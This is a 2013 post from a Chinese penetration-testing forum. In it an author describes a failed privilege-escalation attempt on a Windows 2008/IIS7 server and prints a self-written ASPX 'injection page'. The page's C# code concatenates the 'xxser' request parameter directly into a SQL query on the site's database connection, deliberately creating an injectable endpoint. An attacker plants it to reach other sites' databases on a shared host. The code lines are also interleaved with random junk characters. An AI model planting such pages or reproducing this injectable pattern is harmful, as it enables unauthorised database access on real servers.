中国网络渗透测试联盟

标题: 利用aspx构造注射来跨站 [打印本页]

作者: admin    时间: 2013-3-20 21:32
标题: 利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。( `% j; V' c4 b1 P7 `+ T
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
; K% U0 a9 w2 c% t1 W代码量不多,自己写个拉倒了。烦死了。$ @" _( ?: ~% M2 `+ [0 {( W/ k
0 j: h! g4 K. V3 u
$ V7 A) g+ f0 E" t# |6 h: q, O! d0 }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
% O5 A2 [! h2 L! G: w) M' q<html xmlns="http://www.w3.org/1999/xhtml">
9 R. W& E' D7 d6 ]6 Y  P/ D2 J<head runat="server">. E0 d+ a) Y& Z) `) X( P! \
    <title>暗影aspx构造注射专用页面</title>
' u  B2 z) \$ U" @" ^+ {; P! `" k</head>
- F8 h" N* J1 ~  [<body>* a1 G. Q, A  U4 O1 x' D( A
    <form id="form1" runat="server">9 |: e: B6 K0 [8 i
    <div>
) F- t! d# Q$ c/ P! V     <script language="c#" runat="server">
" \. R& d2 A# V5 x$ n+ p  z5 k0 R            7 K7 O' [, m4 {0 Q" Y, c1 U
         void page_init(object sender, EventArgs e)
  U& U" g, l) l3 p* t3 {         {9 U, z* }; N1 `9 \# K" I& c
             9 G' q0 R) L# e, {. V
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
, B8 e5 y6 Z* g% _7 E+ G6 }" N) h            
9 g( J$ U+ f6 Q" E             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
6 a1 |( U0 h& F! Z( |) Z             conn.Open();: B/ y; l5 V' F/ I1 l( _
             ; X/ L! p0 L$ H7 x1 h
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=19 W0 H( o5 M1 V9 A. l% p
             " p. r- z* A6 \  T
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
( _0 _5 p4 S: c) b( {" ?  `             int x = command.ExecuteNonQuery();
0 u0 r  [$ Q( m" i             Response.Write(i+"\n");8 N$ [) a8 J4 ?7 ^8 ]
             Response.Write(x);' \# ]8 p6 q# K" j) B7 }
             conn.Close();& N! e3 N: s' N4 g1 L6 M
         }1 L6 W: N+ a8 c
     & v, m( v  a# X
  </script>
1 }+ R; Y# ^# I9 ^3 v  ~    </div>
, C# I; E, x3 R& P2 s$ Q) x    </form>
+ }" ~* s6 d- [  C) M9 j, G</body># n  L6 n, e; U' Q8 L
</html>" }# m+ ^! S% d2 e3 b





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2